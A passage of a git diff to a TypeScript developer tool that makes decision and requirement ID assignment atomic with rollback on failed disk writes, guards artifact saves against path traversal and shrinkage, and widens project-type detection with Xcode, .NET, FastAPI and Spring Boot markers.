'', + full_content: '', + superseded_by: null, + }; + + db.upsertRequirement(requirement); + return nextId; + }); + + // Fetch all requirements for full file regeneration + const adapter = db._getAdapter(); + let allRequirements: Requirement[] = []; + if (adapter) { + const rows = adapter.prepare('SELECT * FROM requirements ORDER BY id').all(); + allRequirements = rows.map(row => ({ + id: row['id'] as string, + class: row['class'] as string, + status: row['status'] as string, + description: row['description'] as string, + why: row['why'] as string, + source: row['source'] as string, + primary_owner: row['primary_owner'] as string, + supporting_slices: row['supporting_slices'] as string, + validation: row['validation'] as string, + notes: row['notes'] as string, + full_content: row['full_content'] as string, + superseded_by: (row['superseded_by'] as string) ?? null, + })); + } + + const nonSuperseded = allRequirements.filter(r => r.superseded_by == null); + const md = generateRequirementsMd(nonSuperseded); + const filePath = resolveGsdRootFile(basePath, 'REQUIREMENTS'); + try { + await saveFile(filePath, md); + } catch (diskErr) { + logError('manifest', 'disk write failed, rolling back DB row', { fn: 'saveRequirementToDb', error: String((diskErr as Error).message) }); + try { + const rollbackAdapter = db._getAdapter(); + rollbackAdapter?.prepare('DELETE FROM requirements WHERE id = :id').run({ ':id': id }); + } catch (rollbackErr) { + logError('manifest', 'SPLIT BRAIN: disk write failed AND DB rollback failed — DB has orphaned row', { fn: 'saveRequirementToDb', id, error: String((rollbackErr as Error).message) }); + } + throw diskErr; + } + invalidateStateCache(); + clearPathCache(); + clearParseCache(); + + return { id }; + } catch (err) { + logError('manifest', 'saveRequirementToDb failed', { fn: 'saveRequirementToDb', error: String((err as Error).message) }); + throw err; + } +} + // ─── Save Decision to DB + Regenerate Markdown ──────────────────────────── 
export interface SaveDecisionFields { @@ -188,6 +379,11 @@ export interface SaveDecisionFields { /** * Save a new decision to DB and regenerate DECISIONS.md. * Auto-assigns the next ID via nextDecisionId(). + * + * The ID computation (SELECT MAX) and insert are wrapped in a single + * transaction to prevent parallel tool calls from computing the same ID + * and silently overwriting each other (#3326, #3339, #3459). + * * Returns the assigned ID. */ export async function saveDecisionToDb( @@ -197,18 +393,33 @@ export async function saveDecisionToDb( try { const db = await import('./gsd-db.js'); - const id = await nextDecisionId(); + // Atomic ID assignment + insert inside a transaction to prevent + // parallel calls from racing on the same MAX(id) value. + const id = db.transaction(() => { + const adapter = db._getAdapter(); + if (!adapter) throw new GSDError(GSD_STALE_STATE, "gsd-db: No database open"); - db.upsertDecision({ - id, - when_context: fields.when_context ?? '', - scope: fields.scope, - decision: fields.decision, - choice: fields.choice, - rationale: fields.rationale, - revisable: fields.revisable ?? 'Yes', - made_by: fields.made_by ?? 'agent', - superseded_by: null, + const row = adapter + .prepare('SELECT MAX(CAST(SUBSTR(id, 2) AS INTEGER)) as max_num FROM decisions') + .get(); + const maxNum = row ? (row['max_num'] as number | null) : null; + const nextId = (maxNum == null || isNaN(maxNum)) + ? 'D001' + : `D${String(maxNum + 1).padStart(3, '0')}`; + + db.upsertDecision({ + id: nextId, + when_context: fields.when_context ?? '', + scope: fields.scope, + decision: fields.decision, + choice: fields.choice, + rationale: fields.rationale, + revisable: fields.revisable ?? 'Yes', + made_by: fields.made_by ?? 
'agent', + superseded_by: null, + }); + + return nextId; }); // Fetch all decisions (including superseded for the full register) @@ -230,9 +441,59 @@ export async function saveDecisionToDb( })); } - const md = generateDecisionsMd(allDecisions); const filePath = resolveGsdRootFile(basePath, 'DECISIONS'); - await saveFile(filePath, md); + + // Check if existing DECISIONS.md has freeform (non-table) content. + // If so, preserve that content and append/update the decisions table + // at the end instead of overwriting the entire file. + let existingContent: string | null = null; + if (existsSync(filePath)) { + existingContent = readFileSync(filePath, 'utf-8'); + } + + let md: string; + if (existingContent && !isDecisionsTableFormat(existingContent)) { + // Freeform content detected — preserve it and append decisions table. + // Strip any previously appended decisions table section to avoid duplication. + const marker = '---\n\n## Decisions Table'; + const markerIdx = existingContent.indexOf(marker); + const freeformPart = markerIdx >= 0 + ? existingContent.substring(0, markerIdx).trimEnd() + : existingContent.trimEnd(); + md = freeformPart + '\n' + generateDecisionsAppendBlock(allDecisions); + } else { + // Table format or no existing file — full regeneration (original behavior) + md = generateDecisionsMd(allDecisions); + } + + try { + await saveFile(filePath, md); + } catch (diskErr) { + logError('manifest', 'disk write failed, rolling back DB row', { fn: 'saveDecisionToDb', error: String((diskErr as Error).message) }); + try { + adapter?.prepare('DELETE FROM decisions WHERE id = :id').run({ ':id': id }); + } catch (rollbackErr) { + logError('manifest', 'SPLIT BRAIN: disk write failed AND DB rollback failed — DB has orphaned row', { fn: 'saveDecisionToDb', id, error: String((rollbackErr as Error).message) }); + } + throw diskErr; + } + // #2661: When a decision defers a slice, update the slice status in the DB + // so the dispatcher skips it. 
Without this, STATE.md and DECISIONS.md are + // in split-brain: the decision says "deferred" but the state still says + // "active", causing auto-mode to keep dispatching the deferred work. + try { + const sliceRef = extractDeferredSliceRef(fields); + if (sliceRef) { + db.updateSliceStatus(sliceRef.milestoneId, sliceRef.sliceId, 'deferred'); + } + } catch (deferErr) { + // Non-fatal — log but don't fail the decision save + logError('manifest', 'failed to update deferred slice status', { + fn: 'saveDecisionToDb', + error: String((deferErr as Error).message), + }); + } + // Invalidate file-read caches so deriveState() sees the updated markdown. // Do NOT clear the artifacts table — we just wrote to it intentionally. invalidateStateCache(); @@ -241,11 +502,44 @@ export async function saveDecisionToDb( return { id }; } catch (err) { - process.stderr.write(`gsd-db: saveDecisionToDb failed: ${(err as Error).message}\n`); + logError('manifest', 'saveDecisionToDb failed', { fn: 'saveDecisionToDb', error: String((err as Error).message) }); throw err; } } +/** + * Extract a milestone/slice reference from a deferral decision. + * + * Detects deferrals by checking: + * - scope contains "defer" (e.g., "deferral", "defer") + * - choice or decision contains "defer" + an M###/S## pattern + * + * Returns { milestoneId, sliceId } if found, null otherwise. 
+ */ +export function extractDeferredSliceRef( + fields: Pick, +): { milestoneId: string; sliceId: string } | null { + const isDeferral = + /\bdefer(?:ral|red|ring|s)?\b/i.test(fields.scope) || + /\bdefer(?:ral|red|ring|s)?\b/i.test(fields.choice) || + /\bdefer(?:ral|red|ring|s)?\b/i.test(fields.decision); + + if (!isDeferral) return null; + + // Look for M###/S## pattern in choice first, then decision + const slicePattern = /\b(M\d{3,4})\/(S\d{2,3})\b/; + const choiceMatch = fields.choice.match(slicePattern); + if (choiceMatch) { + return { milestoneId: choiceMatch[1], sliceId: choiceMatch[2] }; + } + const decisionMatch = fields.decision.match(slicePattern); + if (decisionMatch) { + return { milestoneId: decisionMatch[1], sliceId: decisionMatch[2] }; + } + + return null; +} + // ─── Update Requirement in DB + Regenerate Markdown ─────────────────────── /** @@ -260,16 +554,55 @@ export async function updateRequirementInDb( try { const db = await import('./gsd-db.js'); - const existing = db.getRequirementById(id); + let existing = db.getRequirementById(id); + + // If requirement doesn't exist in DB, seed the entire requirements table + // from REQUIREMENTS.md first (#3346). This handles the standard workflow + // where requirements are authored in markdown during discussion but never + // imported into the database — making gsd_requirement_update always fail + // with "not_found" at milestone completion. 
if (!existing) { - throw new GSDError(GSD_STALE_STATE, `Requirement ${id} not found`); + const reqFilePath = resolveGsdRootFile(basePath, 'REQUIREMENTS'); + try { + const content = readFileSync(reqFilePath, 'utf-8'); + const { parseRequirementsSections } = await import('./md-importer.js'); + const parsed = parseRequirementsSections(content); + if (parsed.length > 0) { + logWarning('manifest', `Seeding ${parsed.length} requirements from REQUIREMENTS.md into DB (first update triggers import)`, { fn: 'updateRequirementInDb' }); + for (const req of parsed) { + // Only seed if not already in DB (avoid overwriting concurrent inserts) + if (!db.getRequirementById(req.id)) { + db.upsertRequirement(req); + } + } + // Re-check after seeding + existing = db.getRequirementById(id); + } + } catch { + // REQUIREMENTS.md missing or unparseable — fall through to skeleton + } } - // Merge updates into existing + const base: Requirement = existing ?? { + id, + class: '', + status: 'active', + description: '', + why: '', + source: '', + primary_owner: '', + supporting_slices: '', + validation: '', + notes: '', + full_content: '', + superseded_by: null, + }; + + // Merge updates into existing (or skeleton) const merged: Requirement = { - ...existing, + ...base, ...updates, - id: existing.id, // ID cannot be changed + id: base.id, // ID cannot be changed }; db.upsertRequirement(merged); @@ -301,14 +634,22 @@ export async function updateRequirementInDb( const md = generateRequirementsMd(nonSuperseded); const filePath = resolveGsdRootFile(basePath, 'REQUIREMENTS'); - await saveFile(filePath, md); + try { + await saveFile(filePath, md); + } catch (diskErr) { + logError('manifest', 'disk write failed, reverting DB row', { fn: 'updateRequirementInDb', error: String((diskErr as Error).message) }); + if (existing) { + db.upsertRequirement(existing); + } + throw diskErr; + } // Invalidate file-read caches so deriveState() sees the updated markdown. 
// Do NOT clear the artifacts table — we just wrote to it intentionally. invalidateStateCache(); clearPathCache(); clearParseCache(); } catch (err) { - process.stderr.write(`gsd-db: updateRequirementInDb failed: ${(err as Error).message}\n`); + logError('manifest', 'updateRequirementInDb failed', { fn: 'updateRequirementInDb', error: String((err as Error).message) }); throw err; } } @@ -336,29 +677,55 @@ export async function saveArtifactToDb( try { const db = await import('./gsd-db.js'); + // Guard against path traversal before any reads/writes + const gsdDir = resolve(basePath, '.gsd'); + const fullPath = resolve(basePath, '.gsd', opts.path); + if (!fullPath.startsWith(gsdDir)) { + throw new GSDError(GSD_IO_ERROR, `saveArtifactToDb: path escapes .gsd/ directory: ${opts.path}`); + } + + // Shrinkage guard: if the file already exists and the new content is + // significantly smaller (<50%), preserve the richer file on disk and + // store its content in the DB instead of the abbreviated version. + let dbContent = opts.content; + let skipDiskWrite = false; + if (existsSync(fullPath)) { + const existingSize = statSync(fullPath).size; + const newSize = Buffer.byteLength(opts.content, 'utf-8'); + if (existingSize > 0 && newSize < existingSize * 0.5) { + logWarning('manifest', `new content (${newSize}B) is <50% of existing file (${existingSize}B), preserving disk file`, { fn: 'saveArtifactToDb', path: opts.path }); + dbContent = readFileSync(fullPath, 'utf-8'); + skipDiskWrite = true; + } + } + db.insertArtifact({ path: opts.path, artifact_type: opts.artifact_type, milestone_id: opts.milestone_id ?? null, slice_id: opts.slice_id ?? null, task_id: opts.task_id ?? 
null, - full_content: opts.content, + full_content: dbContent, }); - // Write the file to disk (guard against path traversal) - const gsdDir = resolve(basePath, '.gsd'); - const fullPath = resolve(basePath, '.gsd', opts.path); - if (!fullPath.startsWith(gsdDir)) { - throw new GSDError(GSD_IO_ERROR, `saveArtifactToDb: path escapes .gsd/ directory: ${opts.path}`); + // Write the file to disk (only if we're not preserving a richer existing file) + if (!skipDiskWrite) { + try { + await saveFile(fullPath, opts.content); + } catch (diskErr) { + logError('manifest', 'disk write failed, rolling back DB row', { fn: 'saveArtifactToDb', error: String((diskErr as Error).message) }); + const rollbackAdapter = db._getAdapter(); + rollbackAdapter?.prepare('DELETE FROM artifacts WHERE path = :path').run({ ':path': opts.path }); + throw diskErr; + } } - await saveFile(fullPath, opts.content); // Invalidate file-read caches so deriveState() sees the updated markdown. // Do NOT clear the artifacts table — we just wrote to it intentionally. invalidateStateCache(); clearPathCache(); clearParseCache(); } catch (err) { - process.stderr.write(`gsd-db: saveArtifactToDb failed: ${(err as Error).message}\n`); + logError('manifest', 'saveArtifactToDb failed', { fn: 'saveArtifactToDb', error: String((err as Error).message) }); throw err; } } diff --git a/src/resources/extensions/gsd/detection.ts b/src/resources/extensions/gsd/detection.ts index 9a0c159eb..3cfa9bdb8 100644 --- a/src/resources/extensions/gsd/detection.ts +++ b/src/resources/extensions/gsd/detection.ts @@ -6,7 +6,7 @@ * flow to show when entering a project directory. 
*/ -import { existsSync, readdirSync, readFileSync, statSync } from "node:fs"; +import { existsSync, openSync, readSync, closeSync, readdirSync, readFileSync, statSync } from "node:fs"; import { join } from "node:path"; import { homedir } from "node:os"; import { gsdRoot } from "./paths.js"; @@ -48,6 +48,9 @@ export interface V2Detection { hasContext: boolean; } +/** Apple platform SDKROOTs found in Xcode project.pbxproj files. */ +export type XcodePlatform = "iphoneos" | "macosx" | "watchos" | "appletvos" | "xros"; + export interface ProjectSignals { /** Detected project/package files */ detectedFiles: string[]; @@ -57,6 +60,8 @@ export interface ProjectSignals { isMonorepo: boolean; /** Primary language hint */ primaryLanguage?: string; + /** Apple platform SDKROOTs detected from *.xcodeproj/project.pbxproj */ + xcodePlatforms: XcodePlatform[]; /** Has existing CI configuration? */ hasCI: boolean; /** Has existing test setup? */ @@ -87,8 +92,91 @@ export const PROJECT_FILES = [ "mix.exs", "deno.json", "deno.jsonc", + // .NET + ".sln", + ".csproj", + "Directory.Build.props", + // Git submodules + ".gitmodules", + // Xcode + "project.yml", + ".xcodeproj", + ".xcworkspace", + // Cloud platform config files + "firebase.json", + "cdk.json", + "samconfig.toml", + "serverless.yml", + "serverless.yaml", + "azure-pipelines.yml", + // Database / ORM config files + "prisma/schema.prisma", + "supabase/config.toml", + "drizzle.config.ts", + "drizzle.config.js", + "redis.conf", + // React Native markers + "metro.config.js", + "metro.config.ts", + "react-native.config.js", + // Frontend framework config files + "angular.json", + "next.config.js", + "next.config.ts", + "next.config.mjs", + "nuxt.config.ts", + "nuxt.config.js", + "svelte.config.js", + "svelte.config.ts", + // Vue CLI config files + "vue.config.js", + "vue.config.ts", + // Frontend tooling + "tailwind.config.js", + "tailwind.config.ts", + "tailwind.config.mjs", + "tailwind.config.cjs", + // Android project markers 
+ "app/build.gradle", + "app/build.gradle.kts", + // Container / DevOps config files + "Dockerfile", + "docker-compose.yml", + "docker-compose.yaml", + // Infrastructure as Code + "main.tf", + // Kubernetes / Helm markers + "Chart.yaml", + "kustomization.yaml", + // CI/CD markers + ".github/workflows", + // Blockchain / Web3 markers + "hardhat.config.js", + "hardhat.config.ts", + "foundry.toml", + // Data engineering markers + "dbt_project.yml", + "airflow.cfg", + // Game engine markers + "ProjectSettings/ProjectVersion.txt", + "project.godot", + // Python framework markers + "manage.py", + "requirements.txt", ] as const; +/** File extensions that indicate SQLite databases in the project. */ +const SQLITE_EXTENSIONS = [".sqlite", ".sqlite3", ".db"] as const; + +/** File extensions that indicate SQL usage (migrations, schemas, seeds). */ +const SQL_EXTENSIONS = [".sql"] as const; + +/** File extensions that indicate .NET / C# projects. */ +const DOTNET_EXTENSIONS = [".csproj", ".sln", ".fsproj"] as const; + +/** File extensions that indicate Vue.js single-file components. 
*/ +const VUE_EXTENSIONS = [".vue"] as const; + const LANGUAGE_MAP: Record = { "package.json": "javascript/typescript", "Cargo.toml": "rust", @@ -99,6 +187,8 @@ const LANGUAGE_MAP: Record = { "pom.xml": "java", "build.gradle": "java/kotlin", "build.gradle.kts": "kotlin", + "app/build.gradle": "java/kotlin", + "app/build.gradle.kts": "kotlin", "CMakeLists.txt": "c/c++", "composer.json": "php", "pubspec.yaml": "dart/flutter", @@ -106,6 +196,15 @@ const LANGUAGE_MAP: Record = { "mix.exs": "elixir", "deno.json": "typescript/deno", "deno.jsonc": "typescript/deno", + ".sln": "dotnet", + ".csproj": "dotnet", + "Directory.Build.props": "dotnet", + "project.yml": "swift/xcode", + ".xcodeproj": "swift/xcode", + ".xcworkspace": "swift/xcode", + "Dockerfile": "docker", + "manage.py": "python", + "requirements.txt": "python", }; const MONOREPO_MARKERS = [ @@ -140,6 +239,50 @@ const TEST_MARKERS = [ "phpunit.xml", ] as const; +/** Directories skipped during bounded recursive project scans. */ +const RECURSIVE_SCAN_IGNORED_DIRS = new Set([ + ".git", + ".gsd", + ".planning", + ".plans", + ".claude", + ".cursor", + ".vscode", + "node_modules", + ".venv", + "venv", + "dist", + "build", + "coverage", + ".next", + ".nuxt", + "target", + "vendor", + ".turbo", + "Pods", + "bin", + "obj", + ".gradle", + "DerivedData", + "out", +]) as ReadonlySet; + +/** Project file markers safe to detect recursively via suffix matching. 
*/ +const ROOT_ONLY_PROJECT_FILES = new Set([ + ".github/workflows", + "package.json", + "Gemfile", + "Makefile", + "CMakeLists.txt", + "build.gradle", + "build.gradle.kts", + "deno.json", + "deno.jsonc", +]); + +const MAX_RECURSIVE_SCAN_FILES = 2000; +const MAX_RECURSIVE_SCAN_DEPTH = 6; + // ─── Core Detection ───────────────────────────────────────────────────────────── /** @@ -222,8 +365,8 @@ function detectV2Gsd(basePath: string): V2Detection | null { if (!existsSync(gsdPath)) return null; const hasPreferences = - existsSync(join(gsdPath, "preferences.md")) || - existsSync(join(gsdPath, "PREFERENCES.md")); + existsSync(join(gsdPath, "PREFERENCES.md")) || + existsSync(join(gsdPath, "preferences.md")); const hasContext = existsSync(join(gsdPath, "CONTEXT.md")); @@ -261,9 +404,88 @@ export function detectProjectSignals(basePath: string): ProjectSignals { } } + // Bounded recursive scan for nested markers and dependency files. + // This covers common brownfield layouts like src/App/App.csproj, + // db/migrations/*.sql, src/components/*.vue, and services/api/pyproject.toml + // without walking the entire repo or diving into heavyweight folders. + const scannedFiles = scanProjectFiles(basePath); + + for (const file of PROJECT_FILES) { + if (detectedFiles.includes(file) || ROOT_ONLY_PROJECT_FILES.has(file)) continue; + const hasMatch = file === "requirements.txt" + ? 
scannedFiles.some(isPythonRequirementsFile) + : scannedFiles.some((scannedFile) => matchesProjectFileMarker(scannedFile, file)); + if (hasMatch) { + pushUnique(detectedFiles, file); + if (!primaryLanguage && LANGUAGE_MAP[file]) { + primaryLanguage = LANGUAGE_MAP[file]; + } + } + } + + if (scannedFiles.some((file) => SQLITE_EXTENSIONS.some((ext) => file.endsWith(ext)))) { + pushUnique(detectedFiles, "*.sqlite"); + } + if (scannedFiles.some((file) => SQL_EXTENSIONS.some((ext) => file.endsWith(ext)))) { + pushUnique(detectedFiles, "*.sql"); + } + + const hasCsproj = scannedFiles.some((file) => file.endsWith(".csproj")); + const hasFsproj = scannedFiles.some((file) => file.endsWith(".fsproj")); + const hasSln = scannedFiles.some((file) => file.endsWith(".sln")); + + if (hasCsproj) { + pushUnique(detectedFiles, "*.csproj"); + if (!primaryLanguage) primaryLanguage = "csharp"; + } + if (hasFsproj) { + pushUnique(detectedFiles, "*.fsproj"); + if (!primaryLanguage) primaryLanguage = "fsharp"; + } + if (hasSln) { + pushUnique(detectedFiles, "*.sln"); + if (!primaryLanguage) primaryLanguage = "dotnet"; + } + + if (scannedFiles.some((file) => VUE_EXTENSIONS.some((ext) => file.endsWith(ext)))) { + pushUnique(detectedFiles, "*.vue"); + } + + // Python framework detection — scan dependency files for framework-specific packages. + // Adds synthetic markers (e.g. "dep:fastapi") so skill catalog matchFiles can reference them. 
+ const dependencyFiles = scannedFiles.filter((file) => + isPythonRequirementsFile(file) || file.endsWith("pyproject.toml"), + ); + if (containsFastapiDependency(basePath, dependencyFiles)) { + pushUnique(detectedFiles, "dep:fastapi"); + } + + const springBootBuildFiles = scannedFiles.filter((file) => + file.endsWith("pom.xml") || file.endsWith("build.gradle") || file.endsWith("build.gradle.kts"), + ); + const springBootVersionCatalogs = scannedFiles.filter((file) => file.endsWith(".versions.toml")); + const springBootSettingsFiles = scannedFiles.filter((file) => + file.endsWith("settings.gradle") || file.endsWith("settings.gradle.kts"), + ); + if (containsSpringBootMarker(basePath, springBootBuildFiles, springBootVersionCatalogs, springBootSettingsFiles)) { + pushUnique(detectedFiles, "dep:spring-boot"); + if (!primaryLanguage) { + primaryLanguage = "java/kotlin"; + } + } + // Git repo detection const isGitRepo = existsSync(join(basePath, ".git")); + // Xcode platform detection — parse SDKROOT from project.pbxproj + const xcodePlatforms = detectXcodePlatforms(basePath); + + // Set primaryLanguage to swift when an Xcode project is found but no + // Package.swift was detected (CocoaPods or SPM-less projects). + if (!primaryLanguage && xcodePlatforms.length > 0) { + primaryLanguage = "swift"; + } + // Monorepo detection let isMonorepo = false; for (const marker of MONOREPO_MARKERS) { @@ -306,6 +528,7 @@ export function detectProjectSignals(basePath: string): ProjectSignals { isGitRepo, isMonorepo, primaryLanguage, + xcodePlatforms, hasCI, hasTests, packageManager, @@ -313,6 +536,100 @@ export function detectProjectSignals(basePath: string): ProjectSignals { }; } +// ─── Xcode Platform Detection ─────────────────────────────────────────────────── + +/** Known SDKROOT values → canonical platform names. 
*/ +const SDKROOT_MAP: Record = { + iphoneos: "iphoneos", + iphonesimulator: "iphoneos", // simulator builds still target iOS + macosx: "macosx", + watchos: "watchos", + watchsimulator: "watchos", + appletvos: "appletvos", + appletvsimulator: "appletvos", + xros: "xros", + xrsimulator: "xros", +}; + +/** Regex for SUPPORTED_PLATFORMS — fallback when SDKROOT = auto (Xcode 15+). */ +const SUPPORTED_PLATFORMS_RE = /SUPPORTED_PLATFORMS\s*=\s*"([^"]+)"/gi; + +/** Read at most `maxBytes` from a file without loading the full file into memory. */ +function readBounded(filePath: string, maxBytes: number): string { + const buf = Buffer.alloc(maxBytes); + const fd = openSync(filePath, "r"); + try { + const bytesRead = readSync(fd, buf, 0, maxBytes, 0); + return buf.toString("utf-8", 0, bytesRead); + } finally { + closeSync(fd); + } +} + +/** Common subdirectories where .xcodeproj may live in monorepos / standard layouts. */ +const XCODE_SUBDIRS = ["ios", "macos", "app", "apps"] as const; + +/** + * Scan *.xcodeproj directories for project.pbxproj and extract SDKROOT values. + * Returns deduplicated, canonical platform list (e.g. ["iphoneos"]). + * + * Reading the pbxproj is a lightweight regex scan — no full plist parsing needed. + * We read at most 1 MB per file to keep detection fast. + * Searches both the project root and common subdirectories (ios/, macos/, app/). 
+ */ +function detectXcodePlatforms(basePath: string): XcodePlatform[] { + const platforms = new Set(); + + // Directories to scan: project root + common subdirs + const dirsToScan = [basePath]; + for (const sub of XCODE_SUBDIRS) { + const subPath = join(basePath, sub); + if (existsSync(subPath)) dirsToScan.push(subPath); + } + + for (const dir of dirsToScan) { + try { + const entries = readdirSync(dir, { withFileTypes: true }); + for (const entry of entries) { + if (!entry.isDirectory() || !entry.name.endsWith(".xcodeproj")) continue; + const pbxprojPath = join(dir, entry.name, "project.pbxproj"); + try { + const content = readBounded(pbxprojPath, 1024 * 1024); + // Match SDKROOT = ; — both quoted and unquoted forms + const sdkRe = /SDKROOT\s*=\s*"?([a-z]+)"?\s*;/gi; + let m: RegExpExecArray | null; + let foundExplicit = false; + while ((m = sdkRe.exec(content)) !== null) { + const val = m[1].toLowerCase(); + if (val === "auto") continue; // handled below via SUPPORTED_PLATFORMS + const canonical = SDKROOT_MAP[val]; + if (canonical) { + platforms.add(canonical); + foundExplicit = true; + } + } + // Xcode 15+ defaults SDKROOT to "auto"; fall back to SUPPORTED_PLATFORMS + if (!foundExplicit) { + let sp: RegExpExecArray | null; + while ((sp = SUPPORTED_PLATFORMS_RE.exec(content)) !== null) { + for (const tok of sp[1].split(/\s+/)) { + const canonical = SDKROOT_MAP[tok.toLowerCase()]; + if (canonical) platforms.add(canonical); + } + } + SUPPORTED_PLATFORMS_RE.lastIndex = 0; + } + } catch { + // unreadable pbxproj — skip + } + } + } catch { + // unreadable directory + } + } + return [...platforms]; +} + // ─── Package Manager Detection ────────────────────────────────────────────────── function detectPackageManager(basePath: string): string | undefined { @@ -373,7 +690,7 @@ function detectVerificationCommands( commands.push("go vet ./..."); } - if (detectedFiles.includes("pyproject.toml") || detectedFiles.includes("setup.py")) { + if 
(detectedFiles.includes("pyproject.toml") || detectedFiles.includes("setup.py") || detectedFiles.includes("requirements.txt")) { commands.push("pytest"); } @@ -403,8 +720,8 @@ function detectVerificationCommands( */ export function hasGlobalSetup(): boolean { return ( - existsSync(join(gsdHome, "preferences.md")) || - existsSync(join(gsdHome, "PREFERENCES.md")) + existsSync(join(gsdHome, "PREFERENCES.md")) || + existsSync(join(gsdHome, "preferences.md")) ); } @@ -417,8 +734,8 @@ export function isFirstEverLaunch(): boolean { // If we have preferences, not first launch if ( - existsSync(join(gsdHome, "preferences.md")) || - existsSync(join(gsdHome, "PREFERENCES.md")) + existsSync(join(gsdHome, "PREFERENCES.md")) || + existsSync(join(gsdHome, "preferences.md")) ) { return false; } @@ -468,3 +785,370 @@ function readMakefileTargets(basePath: string): string[] { return []; } } + +function pushUnique(arr: string[], value: string): void { + if (!arr.includes(value)) arr.push(value); +} + +function matchesProjectFileMarker(scannedFile: string, marker: string): boolean { + const normalized = scannedFile.replaceAll("\\", "/"); + return ( + normalized === marker || + normalized.endsWith(`/${marker}`) + ); +} + +function isPythonRequirementsFile(relativePath: string): boolean { + const normalized = relativePath.replaceAll("\\", "/"); + const basename = normalized.slice(normalized.lastIndexOf("/") + 1); + return ( + basename === "requirements.txt" || + basename === "requirements.in" || + /^requirements([-.].+)?\.(txt|in)$/i.test(basename) || + /(^|\/)requirements\/.+\.(txt|in)$/i.test(normalized) + ); +} + +function containsFastapiDependency(basePath: string, relativePaths: string[]): boolean { + for (const relativePath of relativePaths) { + try { + const raw = readBounded(join(basePath, relativePath), 64 * 1024); + const content = extractDependencyContent(relativePath, raw); + if (isPythonRequirementsFile(relativePath)) { + for (const line of content.split("\n")) { + if 
(extractRequirementName(line) === "fastapi") return true; + } + continue; + } + + if (relativePath.endsWith("pyproject.toml")) { + if (containsFastapiInPyproject(content)) return true; + } + } catch { + // unreadable file — continue scanning other candidate files + } + } + + return false; +} + +function containsSpringBootMarker( + basePath: string, + buildFiles: string[], + versionCatalogFiles: string[], + settingsFiles: string[], +): boolean { + const usedPluginAliases = new Set(); + const usedLibraryAliases = new Set(); + const catalogAccessors = resolveVersionCatalogAccessors(basePath, versionCatalogFiles, settingsFiles); + + for (const relativePath of buildFiles) { + try { + const raw = readBounded(join(basePath, relativePath), 64 * 1024); + const content = stripDependencyComments(relativePath, raw); + if (containsDirectSpringBootReference(relativePath, content)) { + return true; + } + + const normalized = content.toLowerCase(); + let match: RegExpExecArray | null; + for (const accessor of catalogAccessors) { + const aliasRe = new RegExp(`alias\\(\\s*${accessor}\\.plugins\\.([a-z0-9_.-]+)\\s*\\)`, "gi"); + while ((match = aliasRe.exec(normalized)) !== null) { + usedPluginAliases.add(normalizePluginAlias(match[1])); + } + + const libraryAliasRe = new RegExp(`\\b${accessor}\\.((?!plugins\\b)[a-z0-9_.-]+)`, "gi"); + while ((match = libraryAliasRe.exec(normalized)) !== null) { + usedLibraryAliases.add(normalizePluginAlias(match[1])); + } + } + } catch { + // unreadable build file — continue scanning others + } + } + + if (usedPluginAliases.size === 0 && usedLibraryAliases.size === 0) { + return false; + } + if (versionCatalogFiles.length === 0) { + return false; + } + + const springBootAliases = new Set(); + const springBootLibraries = new Set(); + const pendingSpringBootBundles: Array<{ bundleAlias: string; referencedAliases: string[] }> = []; + for (const relativePath of versionCatalogFiles) { + try { + const raw = readBounded(join(basePath, relativePath), 64 * 
1024); + const content = stripDependencyComments(relativePath, raw); + const aliasRe = /^\s*([A-Za-z0-9_.-]+)\s*=\s*\{[^\n}]*\bid\s*=\s*["']org\.springframework\.boot["'][^\n}]*\}/gm; + let match: RegExpExecArray | null; + while ((match = aliasRe.exec(content)) !== null) { + springBootAliases.add(normalizePluginAlias(match[1])); + } + + const libraryRe = /^\s*([A-Za-z0-9_.-]+)\s*=\s*\{[^\n}]*\b(module\s*=\s*["']org\.springframework\.boot:[^"']+["']|group\s*=\s*["']org\.springframework\.boot["'][^\n}]*\bname\s*=\s*["']spring-boot[^"']*["'])[^\n}]*\}/gm; + while ((match = libraryRe.exec(content)) !== null) { + springBootLibraries.add(normalizePluginAlias(match[1])); + } + + const bundleRe = /^\s*([A-Za-z0-9_.-]+)\s*=\s*\[([\s\S]*?)\]/gm; + while ((match = bundleRe.exec(content)) !== null) { + pendingSpringBootBundles.push({ + bundleAlias: normalizePluginAlias(`bundles.${match[1]}`), + referencedAliases: match[2] + .split(",") + .map((part) => normalizePluginAlias(part.replace(/["'\s]/g, ""))) + .filter(Boolean), + }); + } + } catch { + // unreadable version catalog — continue scanning others + } + } + + const springBootBundles = new Set(); + for (const pendingBundle of pendingSpringBootBundles) { + if (pendingBundle.referencedAliases.some((alias) => springBootLibraries.has(alias))) { + springBootBundles.add(pendingBundle.bundleAlias); + } + } + + for (const alias of usedPluginAliases) { + if (springBootAliases.has(alias)) return true; + } + for (const alias of usedLibraryAliases) { + if (springBootLibraries.has(alias) || springBootBundles.has(alias)) return true; + } + + return false; +} + +function stripDependencyComments(relativePath: string, content: string): string { + if (relativePath.endsWith("requirements.txt")) { + return content.replace(/(^|\s)#.*$/gm, ""); + } + if (relativePath.endsWith("pyproject.toml")) { + return content.replace(/(^|\s)#.*$/gm, ""); + } + if (relativePath.endsWith(".versions.toml")) { + return content.replace(/(^|\s)#.*$/gm, ""); + } + 
if (relativePath.endsWith("settings.gradle") || relativePath.endsWith("settings.gradle.kts")) { + return content + .replace(/\/\*[\s\S]*?\*\//g, "") + .replace(/\/\/.*$/gm, ""); + } + if (relativePath.endsWith("pom.xml")) { + return content.replace(//g, ""); + } + if (relativePath.endsWith("build.gradle") || relativePath.endsWith("build.gradle.kts")) { + return content + .replace(/\/\*[\s\S]*?\*\//g, "") + .replace(/\/\/.*$/gm, ""); + } + return content; +} + +function extractDependencyContent(relativePath: string, content: string): string { + const stripped = stripDependencyComments(relativePath, content); + if (relativePath.endsWith("pyproject.toml")) { + return extractPyprojectDependencySections(stripped); + } + return stripped; +} + +function extractRequirementName(spec: string): string | null { + const trimmed = spec.trim().replace(/^["']|["']$/g, ""); + if (!trimmed) return null; + + const match = trimmed.match(/^([A-Za-z0-9_.-]+)(?:\[[^\]]+\])?(?=\s*(?:@|[<>=!~;]|$))/); + if (!match) return null; + return normalizePackageName(match[1]); +} + +function containsFastapiInPyproject(content: string): boolean { + for (const line of content.split("\n")) { + const keyMatch = line.match(/^\s*([A-Za-z0-9_.-]+)\s*=/); + if (keyMatch) { + const key = normalizePackageName(keyMatch[1]); + if (key === "fastapi") { + return true; + } + if (key !== "dependencies") { + continue; + } + } + + const quotedSpecRe = /["']([^"']+)["']/g; + let match: RegExpExecArray | null; + while ((match = quotedSpecRe.exec(line)) !== null) { + if (extractRequirementName(match[1]) === "fastapi") { + return true; + } + } + } + + return false; +} + +function 